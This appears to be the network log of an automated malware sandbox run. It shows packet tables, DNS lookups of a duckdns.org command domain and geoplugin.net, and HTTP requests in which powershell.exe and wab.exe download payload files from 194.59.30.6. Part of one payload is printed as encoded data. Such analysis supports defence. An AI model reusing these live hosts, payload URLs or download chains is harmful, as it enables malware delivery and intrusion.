                              May 31, 2024 08:10:16.668607950 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.668626070 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.669109106 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.669118881 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.669162989 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.781308889 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.781330109 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.781383038 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.781409025 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.781424046 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.782901049 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.782902956 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.782913923 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.782951117 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.782979965 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.783020973 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.783051014 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.783057928 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.895451069 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.895474911 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.895519972 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.895525932 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.895581007 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.896821022 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.896836042 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.896889925 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.896894932 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.896966934 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.008860111 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.008877993 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.008939981 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.008949041 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.009000063 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.009725094 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.009738922 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.009802103 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.009808064 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.009862900 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.010525942 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.010541916 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.010598898 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.010605097 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.010698080 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.122575998 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.122595072 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.122661114 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.122684956 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.122735977 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.123467922 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.123483896 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.123534918 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.123541117 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.123672009 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.124104023 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.124120951 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.124157906 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.124162912 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.124187946 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.124207020 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.124864101 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.124878883 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.124931097 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.124936104 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.125035048 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236552000 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236573935 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236637115 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236651897 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236684084 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236797094 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236819029 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236852884 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236857891 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236885071 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236905098 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237369061 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.237422943 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237431049 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.237441063 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.237483978 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237575054 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237587929 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.237616062 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237633944 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:28.344671965 CEST305051547178.215.236.110192.168.2.6
                              May 31, 2024 08:10:28.351078033 CEST515473050192.168.2.6178.215.236.110
                              May 31, 2024 08:10:28.356092930 CEST305051547178.215.236.110192.168.2.6
                              May 31, 2024 08:10:50.689421892 CEST5155880192.168.2.6137.220.252.40
                              May 31, 2024 08:10:50.694314957 CEST8051558137.220.252.40192.168.2.6
                              May 31, 2024 08:10:50.694402933 CEST5155880192.168.2.6137.220.252.40
                              May 31, 2024 08:10:50.697144032 CEST5155880192.168.2.6137.220.252.40
                              May 31, 2024 08:10:50.701984882 CEST8051558137.220.252.40192.168.2.6
                              May 31, 2024 08:10:51.477447033 CEST8051558137.220.252.40192.168.2.6
                              May 31, 2024 08:10:51.477530956 CEST8051558137.220.252.40192.168.2.6
                              May 31, 2024 08:10:51.477579117 CEST5155880192.168.2.6137.220.252.40
                              May 31, 2024 08:10:51.482357025 CEST5155880192.168.2.6137.220.252.40
                              May 31, 2024 08:10:51.487171888 CEST8051558137.220.252.40192.168.2.6
                              May 31, 2024 08:10:58.870346069 CEST305051547178.215.236.110192.168.2.6
                              May 31, 2024 08:10:58.871705055 CEST515473050192.168.2.6178.215.236.110
                              May 31, 2024 08:10:58.876672029 CEST305051547178.215.236.110192.168.2.6
                              May 31, 2024 08:11:06.599477053 CEST5155980192.168.2.637.235.104.9
                              May 31, 2024 08:11:06.604564905 CEST805155937.235.104.9192.168.2.6
                              May 31, 2024 08:11:06.604660988 CEST5155980192.168.2.637.235.104.9
                              May 31, 2024 08:11:06.606436968 CEST5155980192.168.2.637.235.104.9
                              May 31, 2024 08:11:06.611294985 CEST805155937.235.104.9192.168.2.6
                              May 31, 2024 08:11:07.296140909 CEST805155937.235.104.9192.168.2.6
                              May 31, 2024 08:11:07.296998978 CEST805155937.235.104.9192.168.2.6
                              May 31, 2024 08:11:07.297075033 CEST5155980192.168.2.637.235.104.9
                              May 31, 2024 08:11:08.114021063 CEST5155980192.168.2.637.235.104.9
                              May 31, 2024 08:11:08.208479881 CEST5155080192.168.2.6178.237.33.50
                              May 31, 2024 08:11:08.208553076 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:11:08.582822084 CEST5155080192.168.2.6178.237.33.50
                              May 31, 2024 08:11:08.613950968 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:11:09.192347050 CEST5155080192.168.2.6178.237.33.50
                              May 31, 2024 08:11:09.218169928 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:11:10.397077084 CEST5155080192.168.2.6178.237.33.50
                              May 31, 2024 08:11:10.427078009 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:11:10.500684977 CEST5156180192.168.2.637.235.104.9
                              May 31, 2024 08:11:11.504563093 CEST5156180192.168.2.637.235.104.9
                              May 31, 2024 08:11:11.758122921 CEST805156137.235.104.9192.168.2.6
                              May 31, 2024 08:11:11.758155107 CEST805156137.235.104.9192.168.2.6
                              May 31, 2024 08:11:11.758234978 CEST5156180192.168.2.637.235.104.9
                              May 31, 2024 08:11:11.760797977 CEST5156180192.168.2.637.235.104.9
                              May 31, 2024 08:11:11.765670061 CEST805156137.235.104.9192.168.2.6
                              May 31, 2024 08:11:12.544970989 CEST805156137.235.104.9192.168.2.6
                              May 31, 2024 08:11:12.544991016 CEST805156137.235.104.9192.168.2.6
                              May 31, 2024 08:11:12.545042992 CEST5156180192.168.2.637.235.104.9
                              May 31, 2024 08:11:12.801434040 CEST5155080192.168.2.6178.237.33.50
                              May 31, 2024 08:11:12.832707882 CEST5154480192.168.2.6194.59.30.6
                              TimestampSource PortDest PortSource IPDest IP
                              May 31, 2024 08:09:33.670591116 CEST5361525162.159.36.2192.168.2.6
                              May 31, 2024 08:09:34.148000956 CEST5256253192.168.2.61.1.1.1
                              May 31, 2024 08:09:34.155992985 CEST53525621.1.1.1192.168.2.6
                              May 31, 2024 08:09:35.189214945 CEST5383953192.168.2.61.1.1.1
                              May 31, 2024 08:09:35.196681023 CEST53538391.1.1.1192.168.2.6
                              May 31, 2024 08:09:37.729357004 CEST5553653192.168.2.61.1.1.1
                              May 31, 2024 08:09:37.850836992 CEST53555361.1.1.1192.168.2.6
                              May 31, 2024 08:09:38.701322079 CEST5761753192.168.2.61.1.1.1
                              May 31, 2024 08:09:38.709060907 CEST53576171.1.1.1192.168.2.6
                              May 31, 2024 08:09:43.475878954 CEST6489853192.168.2.61.1.1.1
                              May 31, 2024 08:09:43.546741009 CEST53648981.1.1.1192.168.2.6
                              May 31, 2024 08:10:50.021646023 CEST5891653192.168.2.61.1.1.1
                              May 31, 2024 08:10:50.682832956 CEST53589161.1.1.1192.168.2.6
                              May 31, 2024 08:11:06.529664040 CEST6287453192.168.2.61.1.1.1
                              May 31, 2024 08:11:06.597244024 CEST53628741.1.1.1192.168.2.6
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              May 31, 2024 08:09:34.148000956 CEST192.168.2.61.1.1.10xdaf5Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                              May 31, 2024 08:09:35.189214945 CEST192.168.2.61.1.1.10xde10Standard query (0)103.169.127.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                              May 31, 2024 08:09:37.729357004 CEST192.168.2.61.1.1.10xe89cStandard query (0)jgbours284hawara02.duckdns.orgA (IP address)IN (0x0001)false
                              May 31, 2024 08:09:38.701322079 CEST192.168.2.61.1.1.10xaa4Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                              May 31, 2024 08:09:43.475878954 CEST192.168.2.61.1.1.10xc5b4Standard query (0)ramirex.roA (IP address)IN (0x0001)false
                              May 31, 2024 08:10:50.021646023 CEST192.168.2.61.1.1.10x5107Standard query (0)www.387mfyr.sbsA (IP address)IN (0x0001)false
                              May 31, 2024 08:11:06.529664040 CEST192.168.2.61.1.1.10x9513Standard query (0)www.led-svitidla.euA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              May 31, 2024 08:09:34.155992985 CEST1.1.1.1192.168.2.60xdaf5Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                              May 31, 2024 08:09:35.196681023 CEST1.1.1.1192.168.2.60xde10Name error (3)103.169.127.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                              May 31, 2024 08:09:37.850836992 CEST1.1.1.1192.168.2.60xe89cNo error (0)jgbours284hawara02.duckdns.org178.215.236.110A (IP address)IN (0x0001)false
                              May 31, 2024 08:09:38.709060907 CEST1.1.1.1192.168.2.60xaa4No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                              May 31, 2024 08:09:43.546741009 CEST1.1.1.1192.168.2.60xc5b4No error (0)ramirex.ro188.215.50.15A (IP address)IN (0x0001)false
                              May 31, 2024 08:10:50.682832956 CEST1.1.1.1192.168.2.60x5107No error (0)www.387mfyr.sbs137.220.252.40A (IP address)IN (0x0001)false
                              May 31, 2024 08:11:06.597244024 CEST1.1.1.1192.168.2.60x9513No error (0)www.led-svitidla.euled-svitidla.euCNAME (Canonical name)IN (0x0001)false
                              May 31, 2024 08:11:06.597244024 CEST1.1.1.1192.168.2.60x9513No error (0)led-svitidla.eu37.235.104.9A (IP address)IN (0x0001)false
                              • ramirex.ro
                              • 194.59.30.6
                              • geoplugin.net
                              • www.387mfyr.sbs
                              • www.led-svitidla.eu
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649712194.59.30.6802084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              May 31, 2024 08:09:05.310576916 CEST166OUTGET /Uncomic.mdp HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: 194.59.30.6
                              Connection: Keep-Alive
                              May 31, 2024 08:09:06.104875088 CEST1236INHTTP/1.1 200 OK
                              Date: Fri, 31 May 2024 06:09:05 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Wed, 29 May 2024 11:36:06 GMT
                              ETag: "70c18-6199627fa2108"
                              Accept-Ranges: bytes
                              Content-Length: 461848
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Data Raw: 63 51 47 62 36 77 4c 46 6b 4c 76 54 39 52 45 41 36 77 49 73 44 58 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 35 55 49 71 37 33 45 42 6d 33 45 42 6d 34 48 42 78 74 2f 71 41 33 45 42 6d 2b 73 43 4b 51 69 42 77 56 58 64 36 67 7a 72 41 73 64 49 63 51 47 62 36 77 4b 68 65 33 45 42 6d 37 6f 49 4b 47 6c 6c 36 77 49 6b 34 4f 73 43 47 73 4a 78 41 5a 74 78 41 5a 73 78 79 75 73 43 46 71 35 78 41 5a 75 4a 46 41 76 72 41 6d 54 54 36 77 4a 2f 66 4e 48 69 36 77 4b 70 2b 48 45 42 6d 34 50 42 42 4f 73 43 74 4b 6a 72 41 74 78 43 67 66 6e 74 6a 4f 34 42 66 4d 72 72 41 73 49 73 63 51 47 62 69 30 51 6b 42 4f 73 43 4f 73 74 78 41 5a 75 4a 77 2b 73 43 46 44 70 78 41 5a 75 42 77 36 36 55 4d 41 48 72 41 6c 78 41 36 77 49 6d 4d 72 71 63 2b 41 32 59 36 77 4a 61 67 65 73 43 71 4f 71 42 38 6d 52 74 56 36 56 78 41 5a 74 78 41 5a 75 42 36 76 69 56 57 6a 31 78 41 5a 74 78 41 5a 76 72 41 73 30 73 36 77 4c 77 70 58 45 42 6d 2b 73 43 70 67 32 4c 44 42 44 72 41 73 5a 74 63 51 47 62 69 51 77 54 36 77 4c 46 4f 65 73 43 70 61 [TRUNCATED]
                              Data Ascii: cQGb6wLFkLvT9REA6wIsDXEBmwNcJARxAZtxAZu55UIq73EBm3EBm4HBxt/qA3EBm+sCKQiBwVXd6gzrAsdIcQGb6wKhe3EBm7oIKGll6wIk4OsCGsJxAZtxAZsxyusCFq5xAZuJFAvrAmTT6wJ/fNHi6wKp+HEBm4PBBOsCtKjrAtxCgfntjO4BfMrrAsIscQGbi0QkBOsCOstxAZuJw+sCFDpxAZuBw66UMAHrAlxA6wImMrqc+A2Y6wJagesCqOqB8mRtV6VxAZtxAZuB6viVWj1xAZtxAZvrAs0s6wLwpXEBm+sCpg2LDBDrAsZtcQGbiQwT6wLFOesCpaZC6wLWXesCpOyB+ujVBAB10+sClrNxAZuJXCQMcQGbcQGbge0AAwAAcQGbcQGbi1QkCHEBm3EBm4t8JATrAkyf6wJcdInr6wJ0gXEBm4HDnAAAAHEBm3EBm1NxAZtxAZtqQOsCFdRxAZuJ6+sC/c3rAuBax4MAAQAAAJADAusCL5BxAZuBwwABAABxAZtxAZtTcQGbcQGbietxAZvrAkRcibsEAQAAcQGb6wK1bIHDBAEAAHEBm3EBm1PrAu9b6wJF2mr/cQGbcQGbg8IFcQGbcQGbMfbrAnCScQGbMclxAZtxAZuLGusChGzrAn4VQXEBm3EBmzkcCnX06wKbtOsC2kRGcQGb6wKro4B8Cvu4dd1xAZvrAuKHi0QK/HEBm3EBmynw6wInrusCUzf/0nEBm3EBm7ro1QQA6wL66XEBmzHAcQGb6wIek4t8JAzrAt8ocQGbgTQHsFDD9HEBm3EBm4PABHEBm3EBmznQdebrAv7qcQGbiftxAZvrAt8L/9dxAZvrAiCuNZNKETG8BLgpUEIwdxla9OXZJk00fcKsMbnCghpEQh1N/OOrMbmt/oa0lUqgO0KvMa5v9LBQzHC0lMf07peH+bC
                              May 31, 2024 08:09:06.104978085 CEST224INData Raw: 79 61 56 48 6f 30 44 71 37 4d 53 54 4f 39 50 4e 77 6d 62 77 78 46 4d 37 30 4d 79 6f 78 77 68 67 55 51 70 69 39 55 4f 66 78 51 68 64 48 41 44 47 52 69 6a 4f 35 56 55 49 64 39 5a 66 4b 38 54 53 41 42 48 47 48 55 73 50 30 46 53 78 6f 49 7a 48 6c 39
                              Data Ascii: yaVHo0Dq7MSTO9PNwmbwxFM70MyoxwhgUQpi9UOfxQhdHADGRijO5VUId9ZfK8TSABHGHUsP0FSxoIzHl9PawUEQONoFGNdb5SrIx1fT2sFCvUJa1QkGHUsP0RnuXH4mY+ySL3fT2sFDMccqvPAtGlLaSNYFHEjSsSnHIUcP0NL1HEoi1Smn8UcP0MS2/3txQw/s0EVf0sAP7CTSbK217VMMfgINrnRr
                              May 31, 2024 08:09:06.105010986 CEST1236INData Raw: 65 33 73 6b 78 78 50 71 43 53 6b 4d 4f 73 51 39 69 41 6d 38 35 41 37 56 39 6e 6f 4e 72 6e 52 72 65 33 73 6b 78 78 50 71 43 53 6b 4d 4f 73 51 39 69 41 6d 38 35 41 37 56 39 6e 74 6d 47 73 44 57 44 4b 6c 38 67 56 4d 4e 37 4e 54 54 43 39 4c 43 6e 41
                              Data Ascii: e3skxxPqCSkMOsQ9iAm85A7V9noNrnRre3skxxPqCSkMOsQ9iAm85A7V9ntmGsDWDKl8gVMN7NTTC9LCnAPoFe+Cc3+5nQ1hGVPCw2Z7oNZN7zq97X5IxrvWChRRlwsplDWwNvvZ9lPDLzXM2NDXkzki5rOrPTtz6Qg30zXbSWI9P8LDZhtw7Hd9O1Zx/ZtbVGhx83Mf0NLRKcXhQw/QxLb8zNFDD+zTVUPSwuaIztFA0MjS2bb
                              May 31, 2024 08:09:06.105070114 CEST1236INData Raw: 65 77 39 33 4e 74 2f 61 53 66 7a 31 31 77 66 53 77 6e 45 5a 34 39 39 50 47 77 55 45 34 78 51 36 56 66 73 39 45 74 58 6a 76 78 42 4c 79 55 2f 6f 56 75 49 4b 46 73 6c 43 55 53 31 31 33 76 61 51 78 6c 77 53 69 74 70 74 43 41 38 50 31 31 43 73 78 70
                              Data Ascii: ew93Nt/aSfz11wfSwnEZ499PGwUE4xQ6Vfs9EtXjvxBLyU/oVuIKFslCUS113vaQxlwSitptCA8P11Csxp1y+c5lCMxg/bAbgzEoUsWhekomLtfmrIe9hBBZNsd+JH8HS0/rCBMTZmGHFxm2tmF9yfgr8ntjBAnC2hT0cb+i3+DEtt5z9UMP7NKFg9LAIQonM8rj0sF9HAz9Qw6vY6BnyRV/K4CxQw/SwUMP0sFDD9LBQw/QSud
                              May 31, 2024 08:09:06.105110884 CEST1236INData Raw: 55 42 75 5a 44 62 48 41 76 73 61 63 4c 42 65 37 59 6b 4e 45 6f 41 47 6e 54 6a 33 56 62 4e 62 78 54 59 39 6e 77 4e 67 52 57 61 2b 4e 69 36 34 79 63 66 38 42 66 4e 70 4b 45 52 6d 49 74 55 6a 4c 31 4a 30 32 59 71 5a 54 64 2f 62 72 42 77 63 6f 5a 32
                              Data Ascii: UBuZDbHAvsacLBe7YkNEoAGnTj3VbNbxTY9nwNgRWa+Ni64ycf8BfNpKERmItUjL1J02YqZTd/brBwcoZ2nOnWeucXndUIIT28fIQ8lj0F2nFjVguHyarh7Z6f3WEdEJXUm8PZJGb0yeX6zZLCX24lD5PEbtu9PYbQBcQIpcXc+4xZOdEdTBcpgo331fl0TGU+0FddUKcPgxL0TF+rPdidXLviebeA199U1nQaYiRvOYeqql3mQ
                              May 31, 2024 08:09:06.105145931 CEST672INData Raw: 74 41 65 69 6a 59 73 63 31 4a 49 63 50 30 31 43 64 64 55 47 41 45 4d 2b 48 30 54 4b 64 46 41 39 52 70 54 76 64 77 50 61 77 55 4b 76 34 42 38 64 67 66 54 58 54 77 76 53 77 36 48 7a 61 4e 67 72 47 6a 56 2f 55 48 4b 4d 50 4b 61 59 55 6f 4e 45 45 79
                              Data Ascii: tAeijYsc1JIcP01CddUGAEM+H0TKdFA9RpTvdwPawUKv4B8dgfTXTwvSw6HzaNgrGjV/UHKMPKaYUoNEEyc5ZPXVf9o1+Q9EE7czwJ32vLaePql3LoIv23r4Be03Ng3xRDh5Yrxd5Mtq++shhTD3xvuh46DGrhaxOowZ9bWfs3JFOjiZtIDGiykFeJ0I2bTt8qDlK+9bneXMWNbQGxzZfs1HzYmds/XGzi4r3dXxCwW4c+/mZpD
                              May 31, 2024 08:09:06.105185986 CEST672INData Raw: 74 41 65 69 6a 59 73 63 31 4a 49 63 50 30 31 43 64 64 55 47 41 45 4d 2b 48 30 54 4b 64 46 41 39 52 70 54 76 64 77 50 61 77 55 4b 76 34 42 38 64 67 66 54 58 54 77 76 53 77 36 48 7a 61 4e 67 72 47 6a 56 2f 55 48 4b 4d 50 4b 61 59 55 6f 4e 45 45 79
                              Data Ascii: tAeijYsc1JIcP01CddUGAEM+H0TKdFA9RpTvdwPawUKv4B8dgfTXTwvSw6HzaNgrGjV/UHKMPKaYUoNEEyc5ZPXVf9o1+Q9EE7czwJ32vLaePql3LoIv23r4Be03Ng3xRDh5Yrxd5Mtq++shhTD3xvuh46DGrhaxOowZ9bWfs3JFOjiZtIDGiykFeJ0I2bTt8qDlK+9bneXMWNbQGxzZfs1HzYmds/XGzi4r3dXxCwW4c+/mZpD
                              May 31, 2024 08:09:06.105216980 CEST1236INData Raw: 47 31 30 67 35 51 76 43 55 6e 2f 38 62 76 31 2f 44 34 35 68 51 77 2f 53 77 55 4d 50 30 73 46 44 44 39 4c 42 51 77 2f 51 39 6d 48 70 44 2b 30 6e 6c 51 78 5a 64 46 2f 4a 32 72 42 63 68 6b 6e 78 45 43 62 43 6a 4c 69 74 76 36 6e 4a 4d 6b 6b 52 73 56
                              Data Ascii: G10g5QvCUn/8bv1/D45hQw/SwUMP0sFDD9LBQw/Q9mHpD+0nlQxZdF/J2rBchknxECbCjLitv6nJMkkRsVj63qz7i6tY88mpCNlZRxA4xorz++WRK9iOwIpJoH+3CiZHNU6YXmrE3x+14NJDEIXAtcX1I+kOa9SsOadsZK9TDdIKu2LhgRlWcRZbQ60tXkcaTlYB3yxHWOK9eKzGCYc+p613JSjQiV8dKYWlRw/QK1bEDIJwM6N
                              May 31, 2024 08:09:06.105252981 CEST224INData Raw: 62 30 53 51 78 75 59 69 64 56 41 4e 43 42 61 64 77 74 71 41 78 75 55 61 6d 52 43 61 56 61 44 6d 32 77 76 6f 74 61 42 6d 4f 6c 6c 48 32 4e 79 44 31 2f 42 2b 65 7a 31 69 78 4c 51 74 77 51 73 6d 67 53 4e 4b 66 49 4f 2f 62 6f 6e 52 64 33 73 67 2b 57
                              Data Ascii: b0SQxuYidVANCBadwtqAxuUamRCaVaDm2wvotaBmOllH2NyD1/B+ez1ixLQtwQsmgSNKfIO/bonRd3sg+WTkUA+kaHB5Hn/Wsjfb489gpNYOdzWoJQhoxADTgv5f5fLBQw/SwUMP0sFDD9LBQw39BpQOWJLGtpCc+kZUkRSKudyggZgkQX9rvK5DUOtE1WGwRrXV2FGJGAgZ9xtpbdnVGvYmJBtE15qx
                              May 31, 2024 08:09:06.105282068 CEST1236INData Raw: 6a 67 58 56 47 7a 58 6a 46 59 39 45 31 70 44 59 6b 55 61 4d 73 32 53 54 31 68 38 33 36 4a 63 31 42 6e 63 64 72 4e 68 75 57 48 49 72 30 55 66 51 71 63 43 4d 6a 48 72 46 39 44 4f 57 2f 5a 31 74 2b 67 4e 62 32 37 77 6b 39 55 32 66 58 37 2f 46 77 75
                              Data Ascii: jgXVGzXjFY9E1pDYkUaMs2ST1h836Jc1BncdrNhuWHIr0UfQqcCMjHrF9DOW/Z1t+gNb27wk9U2fX7/FwuVFzHWGxdBqOVJY0Us17D0ck7tlWz7JQw6cLjUtQzdEw1yt30HVz0DVReNEAMBuHC32rQjV8Dk62yk3kn3bRZhPyoq9WaDrsNHlBduh4ua94ZUnT16qZ9YuO7gXrs8GTmE5/ZXcIv1HTabBQw/SwUMP0sFDD9LBQw1
                              May 31, 2024 08:09:06.105317116 CEST1236INData Raw: 42 2b 43 6a 5a 78 49 4e 32 53 70 32 75 63 52 71 46 42 31 39 39 56 31 6e 45 61 64 62 56 43 6f 47 53 2b 61 78 66 32 37 78 37 66 4f 6e 69 79 6e 59 74 59 65 63 51 38 78 39 53 2b 6a 38 41 4f 4a 6a 48 49 5a 51 39 31 30 35 46 75 6c 71 32 53 69 41 61 43
                              Data Ascii: B+CjZxIN2Sp2ucRqFB199V1nEadbVCoGS+axf27x7fOniynYtYecQ8x9S+j8AOJjHIZQ9105Fulq2SiAaCRFkVkKRTif9ANgzqtj7PBtt8LAKnMxHCKs8IFDd+7FAivSwUMP0sFDD9LBQw/SwUFjl9NmVc8qg6FXq2RLcMWTnHn39mDiXKzEMDt4yoQ9VpylUkLtXYqVuHYLfQvCUUBRXXNH30JJkksbn77j1O59CAw8J7Ksxpy


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.651544194.59.30.6807108C:\Program Files (x86)\Windows Mail\wab.exe
                              TimestampBytes transferredDirectionData
                              May 31, 2024 08:09:35.158371925 CEST171OUTGET /UWYVFXQWh32.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: 194.59.30.6
                              Cache-Control: no-cache
                              May 31, 2024 08:09:35.811597109 CEST1236INHTTP/1.1 200 OK
                              Date: Fri, 31 May 2024 06:09:35 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Sun, 26 May 2024 13:26:30 GMT
                              ETag: "78c40-6195b593ec35c"
                              Accept-Ranges: bytes
                              Content-Length: 494656
                              Content-Type: application/octet-stream
